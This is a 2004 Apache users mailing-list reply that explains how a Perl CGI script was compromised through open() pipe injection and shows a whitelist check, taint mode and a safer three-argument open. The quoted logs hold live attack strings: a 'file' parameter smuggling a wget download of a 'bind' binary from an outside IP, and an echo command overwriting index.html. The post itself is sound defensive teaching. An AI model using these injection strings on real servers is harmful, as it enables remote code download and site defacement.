httpd-users mailing list archives

From Scott Gifford <sgiff...@suspectclass.com>
Subject Re: [users@httpd] Security Problem
Date Sun, 05 Dec 2004 21:44:56 GMT
Murthy Ambaru <bobby106@yahoo.com> writes:

[...]

> /images/newswireprint.gif HTTP/1.0" 304 -
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0
>
> GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> hosts/xyz.org/httpdocs/index.html|
>
> Can anyone understand how are they able to hack? 

[...]

> #!/usr/local/bin/perl
>
> print "Content-type: text/html\n\n";
>
> &parseForm;
>
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
>
> my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>
> if (!open(FILE,"$data_file")) { die "Can't open";}

This is a Perl question really; you should try asking on a Perl
mailing list/newsgroup or on PerlMonks.org, where you'd get a much
more complete answer from lots of experts.  I'll be happy to do my
best, though.

The essential problem is that Perl's open command will execute a
command if the name of the file it's opening ends with a pipe, so you
can do something like:

    open(LS,"ls |");

to read the output of ls.  In this case, it's trying to open:

    /data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file} |echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html |

which ends up running:

    echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html

which is how the page got hacked.

The solution is to disallow any characters besides letters and numbers
from the filename when you're accepting it, with something like:

    if ($FORM{file} =~ /^([\w.]+)$/)
    {
       $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$1";
    }
    else
    {
      die "Illegal characters in data file";
    }

You should really run your script in taint mode, by starting it with:

    #!/usr/local/bin/perl -T

That will make these sorts of things into runtime errors instead of
security issues, and will force you to fix similar problems in your
program.

Also, you should avoid having permissions set up such that CGI scripts
are allowed to overwrite your Web pages.  That would have prevented
this, although there are a host of other security problems it wouldn't
make a difference for.

You may want to read up on this topic, with something like:

    http://cvs.sourceforge.net/viewcvs.py/*checkout*/brian-d-foy/CGI_MetaFAQ/CGI_MetaFAQ.html?rev=HEAD&content-type=text/html#security

It's important to have a good understanding of security if you plan on
writing or taking responsibility for any sort of program that
interacts with the outside world, like a CGI script.

----ScottG.
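As an added example (not code from this thread or the original script), the whitelist check from the reply wrapped into a function, combined with a three-argument open and taint mode; the base directory is the one from the quoted script, and the sample inputs are constructed from the quoted log lines.

```perl
#!/usr/local/bin/perl -T
# Added example, not from the original thread: hardened file lookup for the
# CGI discussed above. Run as "perl -T thisfile.pl" (taint mode must be on
# from the start, or perl reports "Too late for -T").
use strict;
use warnings;

# Base directory taken from the quoted script.
my $BASE = '/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles';

# Validate an untrusted file name; returns the full path, or undef if rejected.
sub safe_data_file {
    my ($name) = @_;
    return unless defined $name;
    # Letters, digits, underscore and dot only: no '/', no '|', no whitespace.
    # The capture matters: under -T, $1 is the untainted copy of $name.
    return unless $name =~ /^([\w.]+)$/;
    my $clean = $1;
    # '.' and '..' pass the character test but are not data files.
    return if $clean eq '.' || $clean eq '..';
    return "$BASE/$clean";
}

# Read a data file by untrusted name; dies on bad input instead of running anything.
sub read_data_file {
    my ($name) = @_;
    my $path = safe_data_file($name)
        or die "Illegal characters in data file\n";
    # Three-argument open: the mode is fixed to '<', so even a trailing '|'
    # in $path would be treated as part of a literal file name, never a pipe.
    open(my $fh, '<', $path) or die "Can't open $path: $!\n";
    local $/;                 # slurp the whole file
    my $data = <$fh>;
    close($fh);
    return $data;
}

# Constructed inputs: the injected value seen in the log, the path-style value
# from the other log line, and a plain file name.
for my $input ('|echo innocent boys... > index.html|', '/2004/0722-08.htm', 'news.htm') {
    my $path = safe_data_file($input);
    printf "%-40s => %s\n", $input, defined $path ? "accepted ($path)" : 'rejected';
}
```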

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org

